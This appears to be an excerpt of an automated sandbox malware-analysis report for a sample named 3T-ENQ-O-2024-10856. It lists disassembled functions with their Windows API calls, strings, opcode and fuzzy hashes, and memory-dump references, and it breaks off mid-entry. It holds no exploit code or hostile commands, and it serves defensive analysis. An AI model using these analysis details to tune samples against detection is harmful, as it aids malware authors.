                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                • String ID: %s%u
                                • API String ID: 3119225716-679674701
                                • Opcode ID: d2195ac3c27ae0d07540681a5873151670f92a603bdc36c6ce16639ffdf327ef
                                • Instruction ID: fa60b9ec2141ea3e2a2fd6628359ee5cc140aaf828e01f6278739576dc01034c
                                • Opcode Fuzzy Hash: d2195ac3c27ae0d07540681a5873151670f92a603bdc36c6ce16639ffdf327ef
                                • Instruction Fuzzy Hash: D3A1D271204306EFDF14DF64C888BAAB7A8FF54354F008529F9AAD6190DB30EA55DBA1
                                Function 00C9E69D Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                Download Yara Rule
                                APIs
                                • GetClassNameW.USER32(00000008,?,00000400), ref: 00C9E6E1
                                • _wcscmp.LIBCMT ref: 00C9E6F2
                                • GetWindowTextW.USER32(00000001,?,00000400), ref: 00C9E71A
                                • CharUpperBuffW.USER32(?,00000000), ref: 00C9E737
                                • _wcscmp.LIBCMT ref: 00C9E755
                                • _wcsstr.LIBCMT ref: 00C9E766
                                • GetClassNameW.USER32(00000018,?,00000400), ref: 00C9E79E
                                • _wcscmp.LIBCMT ref: 00C9E7AE
                                • GetWindowTextW.USER32(00000002,?,00000400), ref: 00C9E7D5
                                • GetClassNameW.USER32(00000018,?,00000400), ref: 00C9E81E
                                • _wcscmp.LIBCMT ref: 00C9E82E
                                • GetClassNameW.USER32(00000010,?,00000400), ref: 00C9E856
                                • GetWindowRect.USER32(00000004,?), ref: 00C9E8BF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                • String ID: @$ThumbnailClass
                                • API String ID: 1788623398-1539354611
                                • Opcode ID: 804a1990ebd65e38d68dcd936d78248e5d8a78d9781541a59c88c0c008d12ffd
                                • Instruction ID: f5ec1259eacd89264f8c316e1643e47a965ad47817db51730b158fbf82d88880
                                • Opcode Fuzzy Hash: 804a1990ebd65e38d68dcd936d78248e5d8a78d9781541a59c88c0c008d12ffd
                                • Instruction Fuzzy Hash: 92819F310083459BDF15DF54C889FAA7BE8FF64714F04846AFDAA9A092DB30DE45CBA1
                                Function 00C9E4EA Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 104COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: __wcsnicmp
                                • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                • API String ID: 1038674560-1810252412
                                • Opcode ID: 8335518c926e1d1e2966f5af90fefed96e58f3f18acdb0b8a570463d7401b411
                                • Instruction ID: b00260fe9fbe3d7127c9cdfdb5f1b8477ade9f02210a6c20ed3bf6fc497631a3
                                • Opcode Fuzzy Hash: 8335518c926e1d1e2966f5af90fefed96e58f3f18acdb0b8a570463d7401b411
                                • Instruction Fuzzy Hash: 7331AE31A44209BADB24FB60ED87EFE73A55F20708F200524F651B10D6FF526F68E6A5
                                Function 00C9F898 Relevance: 25.7, APIs: 17, Instructions: 168windowtimeCOMMON
                                Download Yara Rule
                                APIs
                                • LoadIconW.USER32(00000063), ref: 00C9F8AB
                                • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00C9F8BD
                                • SetWindowTextW.USER32(?,?), ref: 00C9F8D4
                                • GetDlgItem.USER32(?,000003EA), ref: 00C9F8E9
                                • SetWindowTextW.USER32(00000000,?), ref: 00C9F8EF
                                • GetDlgItem.USER32(?,000003E9), ref: 00C9F8FF
                                • SetWindowTextW.USER32(00000000,?), ref: 00C9F905
                                • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00C9F926
                                • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00C9F940
                                • GetWindowRect.USER32(?,?), ref: 00C9F949
                                • SetWindowTextW.USER32(?,?), ref: 00C9F9B4
                                • GetDesktopWindow.USER32 ref: 00C9F9BA
                                • GetWindowRect.USER32(00000000), ref: 00C9F9C1
                                • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00C9FA0D
                                • GetClientRect.USER32(?,?), ref: 00C9FA1A
                                • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00C9FA3F
                                • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00C9FA6A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                • String ID:
                                • API String ID: 3869813825-0
                                • Opcode ID: 2963ae3184ce427364c03cb78748d70c270a378ff2d6822d22ba16ad159f163c
                                • Instruction ID: 801584cf511dff5a4f7fbf3b0d9b1a301dc3865f782c4e72e27e06c6e664a2e2
                                • Opcode Fuzzy Hash: 2963ae3184ce427364c03cb78748d70c270a378ff2d6822d22ba16ad159f163c
                                • Instruction Fuzzy Hash: 8B513971900709AFDB209FA8CD89B6EBBB9FF04704F00492DE696E65A0C774A945DB50
                                Function 00CCCC68 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                Download Yara Rule
                                APIs
                                • _memset.LIBCMT ref: 00CCCD0B
                                • DestroyWindow.USER32(?,?), ref: 00CCCD83
                                  • Part of subcall function 00C67E53: _memmove.LIBCMT ref: 00C67EB9
                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00CCCE04
                                • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00CCCE26
                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00CCCE35
                                • DestroyWindow.USER32(?), ref: 00CCCE52
                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00C60000,00000000), ref: 00CCCE85
                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00CCCEA4
                                • GetDesktopWindow.USER32 ref: 00CCCEB9
                                • GetWindowRect.USER32(00000000), ref: 00CCCEC0
                                • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00CCCED2
                                • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00CCCEEA
                                  • Part of subcall function 00C7B155: GetWindowLongW.USER32(?,000000EB), ref: 00C7B166
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                • String ID: 0$tooltips_class32
                                • API String ID: 1297703922-3619404913
                                • Opcode ID: 1b1cc62a0b4acbd8ec9e5157fe4a6a4f43b34a3201e857a6f33d92cd60a18c97
                                • Instruction ID: 86e70c05f82291efa8829d43e2d972d4fed5457f969799100cc41099b21e1bb0
                                • Opcode Fuzzy Hash: 1b1cc62a0b4acbd8ec9e5157fe4a6a4f43b34a3201e857a6f33d92cd60a18c97
                                • Instruction Fuzzy Hash: CC71AE75140349AFD724CF28CCC5FAA7BE5EB89704F44491CF99A9B2A1D770E902DB21
                                Function 00CCF122 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 178windowfileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C7AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00C7AF8E
                                • DragQueryPoint.SHELL32(?,?), ref: 00CCF14B
                                  • Part of subcall function 00CCD5EE: ClientToScreen.USER32(?,?), ref: 00CCD617
                                  • Part of subcall function 00CCD5EE: GetWindowRect.USER32(?,?), ref: 00CCD68D
                                  • Part of subcall function 00CCD5EE: PtInRect.USER32(?,?,00CCEB2C), ref: 00CCD69D
                                • SendMessageW.USER32(?,000000B0,?,?), ref: 00CCF1B4
                                • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00CCF1BF
                                • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00CCF1E2
                                • _wcscat.LIBCMT ref: 00CCF212
                                • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00CCF229
                                • SendMessageW.USER32(?,000000B0,?,?), ref: 00CCF242
                                • SendMessageW.USER32(?,000000B1,?,?), ref: 00CCF259
                                • SendMessageW.USER32(?,000000B1,?,?), ref: 00CCF27B
                                • DragFinish.SHELL32(?), ref: 00CCF282
                                • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00CCF36D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                • API String ID: 169749273-3440237614
                                • Opcode ID: 1c7831189314887f69ea38dac57302a71fb01d0c72fcd27cade0686b4d97cb61
                                • Instruction ID: cd2c085e690afa1f0245db98d9fa999385529cf0dd6cdeba0d21f7f2288c1859
                                • Opcode Fuzzy Hash: 1c7831189314887f69ea38dac57302a71fb01d0c72fcd27cade0686b4d97cb61
                                • Instruction Fuzzy Hash: C9614871108304AFC710EF60DC85E9FBBF9BF99710F004A2DF596961A1DB309A4ADB62
                                Function 00CAB428 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 350timeCOMMON
                                Download Yara Rule
                                APIs
                                • VariantInit.OLEAUT32(00000000), ref: 00CAB46D
                                • VariantCopy.OLEAUT32(?,?), ref: 00CAB476
                                • VariantClear.OLEAUT32(?), ref: 00CAB482
                                • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00CAB561
                                • __swprintf.LIBCMT ref: 00CAB591
                                • VarR8FromDec.OLEAUT32(?,?), ref: 00CAB5BD
                                • VariantInit.OLEAUT32(?), ref: 00CAB63F
                                • SysFreeString.OLEAUT32(00000016), ref: 00CAB6D1
                                • VariantClear.OLEAUT32(?), ref: 00CAB727
                                • VariantClear.OLEAUT32(?), ref: 00CAB736
                                • VariantInit.OLEAUT32(00000000), ref: 00CAB772
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                • String ID: %4d%02d%02d%02d%02d%02d$Default
                                • API String ID: 3730832054-3931177956
                                • Opcode ID: 980d23f8e0fb940b09c9b5eff40a466bea71a5c130c278d244dc919ec4a34b50
                                • Instruction ID: 8bd686bf4f470a89f291269983bea2f86db484caf4d324b0d98393a46532c1cf
                                • Opcode Fuzzy Hash: 980d23f8e0fb940b09c9b5eff40a466bea71a5c130c278d244dc919ec4a34b50
                                • Instruction Fuzzy Hash: 9EC1E331A00616EBCB20DFA6D484B6DB7B4FF0A318F248465F4159B293DB74ED44EBA1
                                Function 00CC6F67 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 244windowCOMMON
                                Download Yara Rule
                                APIs
                                • CharUpperBuffW.USER32(?,?), ref: 00CC6FF9
                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00CC7044
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: BuffCharMessageSendUpper
                                • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                • API String ID: 3974292440-4258414348
                                • Opcode ID: f0365f02742b8116450f4d8b082eedb928340dffee577459767bcc65bee45d6c
                                • Instruction ID: ba885123fdd62152618df58381c53bb62af8ac97e22ab219809c9215fcdaf20a
                                • Opcode Fuzzy Hash: f0365f02742b8116450f4d8b082eedb928340dffee577459767bcc65bee45d6c
                                • Instruction Fuzzy Hash: C9917F742042019FCB14EF15C891F69B7A2EF98350F04896DF8966B3A2CF31ED4ADB42
                                Function 00CCE305 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 199windowlibraryCOMMON
                                Download Yara Rule
                                APIs
                                • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00CCE3BB
                                • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00CCBCBF), ref: 00CCE417
                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00CCE457
                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00CCE49C
                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00CCE4D3
                                • FreeLibrary.KERNEL32(?,00000004,?,?,?,?,00CCBCBF), ref: 00CCE4DF
                                • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00CCE4EF
                                • DestroyIcon.USER32(?,?,?,?,?,00CCBCBF), ref: 00CCE4FE
                                • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00CCE51B
                                • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00CCE527
                                  • Part of subcall function 00C81BC7: __wcsicmp_l.LIBCMT ref: 00C81C50
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                • String ID: .dll$.exe$.icl
                                • API String ID: 1212759294-1154884017
                                • Opcode ID: dbf7f2c9f1fe2ccc6e51dcc086ecaf1544269c7f6e49633cc0d60652c9faa53c
                                • Instruction ID: a6a96acc7948bcc5da904b1ad9e53be2798ed12934befc254d4c5a4524f58b40
                                • Opcode Fuzzy Hash: dbf7f2c9f1fe2ccc6e51dcc086ecaf1544269c7f6e49633cc0d60652c9faa53c
                                • Instruction Fuzzy Hash: 5561A0B1540255BFEB14DFA4CC86FBE77ACAB09714F104219F925EB0D1DB74AA80D7A0
                                Function 00CB0E41 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 184timeCOMMON
                                Download Yara Rule
                                APIs
                                • GetLocalTime.KERNEL32(?), ref: 00CB0EFF
                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 00CB0F0F
                                • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00CB0F1B
                                • __wsplitpath.LIBCMT ref: 00CB0F79
                                • _wcscat.LIBCMT ref: 00CB0F91
                                • _wcscat.LIBCMT ref: 00CB0FA3
                                • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00CB0FB8
                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00CB0FCC
                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00CB0FFE
                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00CB101F
                                • _wcscpy.LIBCMT ref: 00CB102B
                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00CB106A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                • String ID: *.*
                                • API String ID: 3566783562-438819550
                                • Opcode ID: 85ab85fc637627bbc30506d77405201f3b25ae30d10a34f2cb2b2c8a0fa740f6
                                • Instruction ID: 39e062b0ef63789630f344cbb5cf5cfff62a528155b306d2314703915e9c8966
                                • Opcode Fuzzy Hash: 85ab85fc637627bbc30506d77405201f3b25ae30d10a34f2cb2b2c8a0fa740f6
                                • Instruction Fuzzy Hash: 9B617DB25043459FC720EF60C894ADFB3E8FF89314F04891AF99997251EB35EA45CB92
                                Function 00CADAAD Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C684A6: __swprintf.LIBCMT ref: 00C684E5
                                  • Part of subcall function 00C684A6: __itow.LIBCMT ref: 00C68519
                                • CharLowerBuffW.USER32(?,?), ref: 00CADB26
                                • GetDriveTypeW.KERNEL32 ref: 00CADB73
                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00CADBBB
                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00CADBF2
                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00CADC20
                                  • Part of subcall function 00C67E53: _memmove.LIBCMT ref: 00C67EB9
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                • API String ID: 2698844021-4113822522
                                • Opcode ID: 2d81040e540b52ea8c62407f0922a91d5b743d1b2fe0f4b0ec0e743cb4529d98
                                • Instruction ID: c60e53afcdc6bf326eba0fd9b476af122dd71b9adc28f4786e772ec62d48084b
                                • Opcode Fuzzy Hash: 2d81040e540b52ea8c62407f0922a91d5b743d1b2fe0f4b0ec0e743cb4529d98
                                • Instruction Fuzzy Hash: EC516C71108305AFC700EF20D98196AB7F4FF88718F50896CF89A972A1DB31EE09DB52
                                Function 00CA3110 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 129windowCOMMON
                                Download Yara Rule
                                APIs
                                • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00CD4085,00000016,0000138B,?,00000000,?,?,00000000,?), ref: 00CA3145
                                • LoadStringW.USER32(00000000,?,00CD4085,00000016), ref: 00CA314E
                                  • Part of subcall function 00C6CAEE: _memmove.LIBCMT ref: 00C6CB2F
                                • GetModuleHandleW.KERNEL32(00000000,00000000,?,00000FFF,?,?,00CD4085,00000016,0000138B,?,00000000,?,?,00000000,?,00000040), ref: 00CA3170
                                • LoadStringW.USER32(00000000,?,00CD4085,00000016), ref: 00CA3173
                                • __swprintf.LIBCMT ref: 00CA31B3
                                • __swprintf.LIBCMT ref: 00CA31C5
                                • _wprintf.LIBCMT ref: 00CA326C
                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00CA3283
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                • API String ID: 984253442-2268648507
                                • Opcode ID: 25fc7ecc4ef7c62294f4fb84eee5c4463967190ed789589b2a0ba63660c9128a
                                • Instruction ID: 8eed791100c403dafc60fc4ce064030359937794a4bc4b89519ff87dcd838387
                                • Opcode Fuzzy Hash: 25fc7ecc4ef7c62294f4fb84eee5c4463967190ed789589b2a0ba63660c9128a
                                • Instruction Fuzzy Hash: 66414471900249BACB14FBD0DDD7EEEB7789F15704F100565F601B20A2DE616F45EB61
                                Function 00CAD950 Relevance: 22.8, APIs: 10, Strings: 3, Instructions: 100fileCOMMON
                                Download Yara Rule
                                APIs
                                • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00CAD96C
                                • __swprintf.LIBCMT ref: 00CAD98E
                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 00CAD9CB
                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00CAD9F0
                                • _memset.LIBCMT ref: 00CADA0F
                                • _wcsncpy.LIBCMT ref: 00CADA4B
                                • DeviceIoControl.KERNEL32(00000000,000900A4,A0000003,?,00000000,00000000,?,00000000), ref: 00CADA80
                                • CloseHandle.KERNEL32(00000000), ref: 00CADA8B
                                • RemoveDirectoryW.KERNEL32(?), ref: 00CADA94
                                • CloseHandle.KERNEL32(00000000), ref: 00CADA9E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                • String ID: :$\$\??\%s
                                • API String ID: 2733774712-3457252023
                                • Opcode ID: 45695b7722e502eaec026d1b0088a94191904a4b4d1fe46202055a62b7779bc9
                                • Instruction ID: a3a5a49562ebfaede43a1c91a910bc5626ced8fad434780f401584ff4b24119f
                                • Opcode Fuzzy Hash: 45695b7722e502eaec026d1b0088a94191904a4b4d1fe46202055a62b7779bc9
                                • Instruction Fuzzy Hash: 0331C672600249AADB20DFA4DC89FDF77BCAF85714F0081A5F51AD6060EB70DF419BA1
                                Function 00CCE541 Relevance: 22.6, APIs: 15, Instructions: 129filecommemoryCOMMON
                                Download Yara Rule
                                APIs
